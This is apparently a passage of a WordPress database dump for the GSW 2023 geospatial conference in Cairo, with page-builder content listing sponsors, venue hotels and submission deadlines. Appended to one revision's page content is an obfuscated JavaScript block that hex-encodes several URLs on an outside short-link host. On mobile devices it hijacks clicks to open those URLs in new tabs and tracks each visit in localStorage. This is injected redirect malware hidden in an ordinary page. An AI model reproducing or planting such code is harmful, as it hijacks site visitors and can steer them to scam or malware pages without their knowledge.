accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]</p>\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-06-09 22:08:00','2023-06-09 22:08:00','',3066,'https://gsw2023.com/?p=4669',0,'revision','',0),
(4670,1,'2023-06-09 22:08:36','2023-06-09 22:08:36','<p>[vc_row css=\".vc_custom_1680403823446{margin-top: -35px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1685609158984{margin-top: 100px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 36pt;\">Prime Sponsor</span></h4>\n<p>&nbsp;</p>\n<p><a href=\"https://www.gasgi.gov.sa\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4592\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/شعار-الهيئة-العامة-للمساحه-والمعلومات-الجيومكانية-بالمملكة-العربية-السعودية-2-300x110.jpg\" alt=\"\" width=\"447\" height=\"164\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1685609109195{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Platinum Sponsors</strong></span></h4>\n<p><a href=\"https://www.pix4d.com/ \"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406603694{margin-top: 125px !important;}\"]</p>\n<h6><a href=\"https://www.bdstar.com/en/\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406565735{margin-top: 50px !important;}\"]</p>\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\n<p><span style=\"font-size: 8pt;\"><a href=\"http://hdmap.geomatics.ncku.edu.tw/index-US.php\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406679677{margin-top: 137px !important;}\"]<a href=\"www.applanix.com\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684969898333{margin-top: 5px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4500 \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/HEXAGON_STANDARD_CMYK_LOGO-300x124.jpg\" alt=\"\" width=\"341\" height=\"141\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684305185157{margin-top: 40px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684969841504{margin-top: 20px !important;}\"]<a href=\"www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1686345447550{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p><a href=\"https://www.giscon.de/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"wp-image-4597 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/giscon-300x222.jpg\" alt=\"\" width=\"255\" height=\"189\" /><br />\n</a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1686345389553{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Silver Sponsors</strong></span></h4>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"> </a></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1686345510625{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4655 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/Terrasolid_logo_wide2_rgb_300dpi-300x112.png\" alt=\"\" width=\"324\" height=\"121\" /><br />\n</a></p>\n<p>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681676234291{margin-top: 50px !important;}\"]<a href=\"http://www.geosat.com.tw\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406965583{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\n<p><a href=\"http://www.riegl.com\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406157694{margin-top: 88px !important;}\"]<a href=\"http://www.robotlab.com.tw\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_column_text css=\".vc_custom_1684202742439{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\n<p><a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-300x173.png\" alt=\"\" width=\"300\" height=\"173\" /></a></p>\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants. To receive the password for the getting the discount, please send an email to:</p>\n<p style=\"text-align: center;\"><strong>GSW-EGYPTAIR@gsw2023.com</strong></p>\n<p>[/vc_column_text][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/4\" css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1675475943417{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: left;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>&nbsp;</p>\n<h3></h3>\n<p>[/vc_column_text][vc_column_text css=\".vc_custom_1684377464605{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo Semiramis Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fwelcome%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1685736118080{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Read More[/dt_default_button][/vc_column][vc_column width=\"3/4\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"120px\" image_paddings=\"10px 0px 0px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"105\" css_dt_team_masonry=\".vc_custom_1686348458486{margin-top: 220px !important;}\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3283|url^https://gsw2023.com/wp-content/uploads/2022/11/1664433062169.jpg|caption^null|alt^null|title^1664433062169|description^null\" animation_direction=\"top-animation\" bg_override=\"full\"][vc_column width=\"1/2\"][vc_column_text css=\".vc_custom_1684379817578{margin-left: -50px !important;border-left-width: -50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffff00; font-size: 24pt;\">InterContinental Cairo Semiramis</span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\"><img class=\" wp-image-3289 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2022/11/282192719-300x169.jpg\" alt=\"\" width=\"328\" height=\"185\" />Conference Venue </span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Special Rate Booking is Opened Now</span></h4>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fintercontinental%2Fhotels%2Fus%2Fen%2Fcairo%2Fcroha%2Fhoteldetail%3FfromRedirect%3Dtrue%26qSrt%3DsAV%26qIta%3D99801505%26icdv%3D99801505%26qSlH%3DCROHA%26qGrpCd%3DDY8%26setPMCookies%3Dtrue%26qSHBrC%3DIC%26qDest%3DCorniche%2BEl%2BNil%25252C%2BCairo%25252C%2BEG%26srb_u%3D1|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1684379884193{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/2\" awb_type=\"image\"][vc_column_text]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffff00;\">Ramses Hilton hotel</span></h4>\n<h4></h4>\n<p><img class=\"aligncenter\" src=\"https://www.hilton.com/im/en/CAIRHTW/16763081/exterior-night-shot.jpg?impolicy=crop&amp;cw=4849&amp;ch=3334&amp;gravity=NorthWest&amp;xposition=75&amp;yposition=0&amp;rw=320&amp;rh=220\" alt=\"Hotel Exterior at Night\" width=\"262\" height=\"180\" /></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.hilton.com%2Fen%2Fattend-my-event%2Fcairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1684378842229{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_column_text][/vc_column_text][vc_column_text css=\".vc_custom_1675473187232{border-top-width: 25px !important;padding-top: 25px !important;}\"]</p>\n<h3></h3>\n<h3></h3>\n<h3></h3>\n<h3 class=\"fancy-title entry-title start-animation-done start-animation\" style=\"text-align: justify; color: #311b92;\"><strong>IMPORTANT DATES</strong></h3>\n<p>[/vc_column_text][vc_row_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]</p>\n<ul>\n<li><strong>Full paper submission (Annals): April 30, 2023 </strong></li>\n</ul>\n<p>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]</p>\n<ul>\n<li><strong>Full paper Author notification: June 15, 2023</strong></li>\n</ul>\n<p>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]</p>\n<ul>\n<li><strong>Abstract submission (Archives): May 15, 2023</strong></li>\n</ul>\n<p><strong style=\"color: white;\">SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\" css=\".vc_custom_1681902149314{margin-top: -25px !important;}\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract Author notification: June 15, 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"5\"][vc_row_inner css=\".vc_custom_1668021047643{margin-top: 25px !important;}\"][vc_column_inner css=\".vc_custom_1668021165897{padding-top: 40px !important;}\"][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fimportant-dates%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1685735404108{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]ALL IMPORTANT DATES[/dt_default_button][/vc_column_inner][/vc_row_inner][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1668204801057{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][/vc_column_inner][vc_column_inner width=\"3/4\" css=\".vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" 